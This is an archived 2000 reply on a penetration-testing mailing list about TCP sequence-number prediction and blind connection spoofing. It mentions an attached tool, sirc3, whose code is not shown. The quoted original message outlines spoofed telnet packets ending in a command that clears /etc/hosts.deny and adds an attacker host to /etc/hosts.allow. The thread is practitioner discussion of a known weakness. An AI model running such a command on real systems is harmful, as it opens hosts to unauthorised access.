Penetration Testing mailing list archives
Re: [PEN-TEST] Exploiting sequence number predictability
From: Jean-Simon Durand <bugtraq () SUPERNET CA>
Date: Mon, 21 Aug 2000 23:53:09 -0400
sirc3 does something very close to that. It is a very old technique (2-3 years old at least) and it is rarely used today (I think) because the sequence numbers on most of the unix systems are unpredictable. Most windows system are still vulnerable. sirc was made with irc in mind but if I remember correctly, it works with the telnet daemon. It tries to guess the sequence numbers to establish a tcp connection with any source IP address. I attached (uuencoded) a copy of the source code for sirc3. I played with it a very long time ago so I'm not even sure if it needs modification to compile. If I remember correctly, it's for Linux but it can certainly be ported to other OS's. Have fun! Jean-Simon Durand Montreal, Quebec, Canada ----- Original Message ----- From: "Dawes, Rogan" <rdawes () DELOITTE CO ZA> To: <PEN-TEST () SECURITYFOCUS COM> Sent: Friday, August 18, 2000 8:37 AM Subject: [PEN-TEST] Exploiting sequence number predictability [snip]
I imagine it is a case of: 1. determine the predictability algorithm (64k rule, or whatever) 2. Craft the packets required to execute the commands desired with the IP address of a permitted workstation. (packet 1 : SYN packet 2 : ACK xxxxx/username^M packet 3 : ACK xxxxy/password^M packet 4 : ACK xxxxz/echo > /etc/hosts.deny; echo attacker >> /etc/hosts.allow; exit^M, or whatever) where xxxxx-xxxxz are determined by the ISN, the number of bytes in the banner and login prompt, password prompt, and welcome banner/motd)
Attachment:
sirc3.tar.gz.uu
Description:
Current thread:
- Re: [PEN-TEST] Exploiting sequence number predictability, (continued)
- Re: [PEN-TEST] Exploiting sequence number predictability Erik Tayler (Aug 23)
- Re: [PEN-TEST] Exploiting sequence number predictability Marshall Beddoe (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability l0rtamus prime (Aug 21)
- [PEN-TEST] Online Security Vulnerability Services Teicher, Mark (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Ben Lull (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Hiromi Yanaoka (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Riley Hassell (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Jose Nazario (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Todd, George (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Iván Arce (Aug 23)
- Re: [PEN-TEST] Exploiting sequence number predictability Jean-Simon Durand (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Pedro Quintanilha (Aug 23)
- Re: [PEN-TEST] Exploiting sequence number predictability Haroon Meer (Aug 22)